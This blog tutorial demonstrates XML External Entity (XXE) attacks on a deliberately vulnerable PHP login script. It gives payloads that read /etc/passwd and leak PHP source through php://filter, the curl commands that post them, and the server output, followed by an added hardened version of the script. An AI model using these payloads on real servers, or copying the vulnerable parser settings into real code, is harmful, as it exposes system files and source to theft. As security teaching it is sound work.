Wednesday, October 2, 2019

Reading local files with XXE attacks

Today we will be exploring XXE (XML External Entity) attacks. An XXE attack is an attack brought against an application that accepts XML as its input and lets the parser resolve entities declared in the document's DTD.

This is our vulnerable php code:

xml.php
<?php
    // Deliberately vulnerable: re-enables loading of external entities
    // (PHP < 8.0 has it enabled by default anyway).
    libxml_disable_entity_loader(false);
    $xmlfile = file_get_contents('php://input');
    $dom = new DOMDocument();
    // LIBXML_NOENT substitutes entity references with their content and
    // LIBXML_DTDLOAD loads the DTD; together they let an attacker-supplied
    // <!ENTITY ... SYSTEM "file:///..."> declaration be resolved.
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
    $creds = simplexml_import_dom($dom);
    $user = $creds->user;
    $pass = $creds->pass;
    echo "You have logged in as user $user";
?>

Our goal here is to submit a malicious XML file whose document type definition (DTD) declares an external entity pointing at a local file, so that we can read local files on the server. This is the XML file we will POST to the application. If everything goes well, the response will contain the contents of /etc/passwd.

users.xml
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<creds>
    <user>&xxe;</user>
    <pass>mypass</pass>
</creds>

We can post this file to the application using the cURL utility.

root@asus:~/public_html% curl -d @users.xml http://localhost/~sam/xml.php 
You have logged in as user root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
messagebus:x:104:108::/var/run/dbus:/bin/false
syslog:x:105:109::/home/syslog:/bin/false
_apt:x:106:65534::/nonexistent:/bin/false
ntp:x:107:113::/home/ntp:/bin/false
avahi-autoipd:x:108:114:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:109:115:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
colord:x:110:118:colord colour management daemon,,,:/var/lib/colord:/bin/false
dnsmasq:x:111:65534:dnsmasq,,,:/var/lib/misc:/bin/false
pulse:x:112:119:PulseAudio daemon,,,:/var/run/pulse:/bin/false
hplip:x:113:7:HPLIP system user,,,:/var/run/hplip:/bin/false
rtkit:x:114:121:RealtimeKit,,,:/proc:/bin/false
saned:x:115:122::/var/lib/saned:/bin/false
usbmux:x:116:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
speech-dispatcher:x:117:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
uuidd:x:118:123::/run/uuidd:/bin/false
sam:x:1000:1000:sam,,,:/home/sam:/bin/bash
statd:x:119:65534::/var/lib/nfs:/bin/false
mysql:x:120:127:MySQL Server,,,:/nonexistent:/bin/false
openldap:x:121:128:OpenLDAP Server Account,,,:/var/lib/ldap:/bin/false
test:x:1001:1001:test test,333,555-444-3212,:/home/test:/bin/bash
snmp:x:122:129::/var/lib/snmp:/usr/sbin/nologin
clare:x:1002:1002:clare chapman,100,555-222-1234,:/home/clare:/bin/bash
vance:x:1003:1003:vance perkins,101,,:/home/vance:/bin/bash
sasha:x:1004:1004:sasha kim,102,,:/home/sasha:/bin/bash
hayden:x:1005:1005:hayden sutton,103,,:/home/hayden:/bin/bash
jared:x:1006:1006:jared beck,104,,:/home/jared:/bin/bash
dovecot:x:124:132:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
dovenull:x:125:133:Dovecot login user,,,:/nonexistent:/bin/false
bind:x:126:134::/var/cache/bind:/bin/false
ftp:x:127:135:ftp daemon,,,:/srv/ftp:/bin/false
sshd:x:128:65534::/var/run/sshd:/usr/sbin/nologin
user434:x:1007:1007:,,,:/home/user434:/bin/bash
postfix:x:123:130::/var/spool/postfix:/bin/false
muser342:x:1008:1008:,,,:/home/muser342:/bin/bash
muser455:x:1009:1009:,,,:/home/muser455:/bin/bash
muser123:x:1010:1010:,,,:/home/muser123:/bin/bash
muser324:x:1011:1011:,,,:/home/muser324:/bin/bash
muser223:x:1012:1012:,,,:/home/muser223:/bin/bash
root@asus:~/public_html%

As you can see, we successfully POSTed the tainted XML file to the server, the parser resolved the &xxe; entity, and the response echoed back the contents of the /etc/passwd file in place of the username.

Using PHP Filters with XXE

You can also use PHP's php://filter stream wrapper with the convert.base64-encode filter as the entity's SYSTEM URL. Because the file is returned base64-encoded rather than parsed as XML, this lets us read the source code of PHP files on the webserver, which would otherwise break the parse.

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=info.php" >]>
<creds>
    <user>&xxe;</user>
    <pass>mypass</pass>
</creds>

If we load up our request in cURL and submit the POST, we should get the source of the info.php file, base64-encoded.

root@asus:~/public_html% curl -d @users.xml http://localhost/~sam/xml.php 
You have logged in as user PD9waHAgcGhwaW5mbygpOz8+Cg==
root@asus:~/public_html% 

If we decode the string from the response, we get:

root@asus:~/public_html% echo PD9waHAgcGhwaW5mbygpOz8+Cg== | base64 -d
<?php phpinfo();?>
root@asus:~/public_html%
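Both the file:///etc/passwd read and the php://filter source disclosure above work only because xml.php turns entity loading on and parses with LIBXML_NOENT | LIBXML_DTDLOAD. The hardened counterpart below is an added example and not part of the original post; it assumes the same request shape (a raw XML body with <creds><user/><pass/></creds>) and shows the changes that close the hole: reject any body carrying a DTD, leave the external entity loader disabled, and parse without NOENT/DTDLOAD (adding LIBXML_NONET so the parser cannot reach the network either). The libxml_disable_entity_loader() call is guarded because it is deprecated from PHP 8.0, where external entities are off by default.

```php
<?php
// Hardened version of xml.php (added example, not the post's code).
// Assumes the same input: a raw XML body of the form <creds><user/><pass/></creds>.

$xmlfile = file_get_contents('php://input');

// A login payload has no legitimate reason to declare a DTD or entities.
// Rejecting them up front stops both the file:// and php://filter variants
// before the parser ever sees them.
if (stripos($xmlfile, '<!DOCTYPE') !== false || stripos($xmlfile, '<!ENTITY') !== false) {
    http_response_code(400);
    exit('DTD declarations are not accepted');
}

// On PHP < 8.0 the external entity loader is enabled by default, so disable
// it explicitly. On PHP >= 8.0 it is disabled by default and the function is
// deprecated, hence the version guard.
if (PHP_VERSION_ID < 80000) {
    libxml_disable_entity_loader(true);
}

// Collect parser errors instead of emitting warnings into the response.
libxml_use_internal_errors(true);

$dom = new DOMDocument();
// No LIBXML_NOENT (no entity substitution), no LIBXML_DTDLOAD (no DTD
// loading); LIBXML_NONET additionally forbids network access while parsing.
if (!$dom->loadXML($xmlfile, LIBXML_NONET)) {
    libxml_clear_errors();
    http_response_code(400);
    exit('Malformed XML');
}

$creds = simplexml_import_dom($dom);
$user = (string) $creds->user;
$pass = (string) $creds->pass;

// Escape the reflected value so the username cannot inject HTML either.
echo 'You have logged in as user ' . htmlspecialchars($user, ENT_QUOTES, 'UTF-8');
```

With this version, POSTing the users.xml payloads from the post returns an HTTP 400 from the DOCTYPE check; even if that check were removed, the parser would leave &xxe; unresolved and the file contents would never be read. The DOCTYPE string check is a coarse first line of defence (it also rejects harmless inline DTDs), which is acceptable here because the endpoint only ever expects a fixed element structure.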
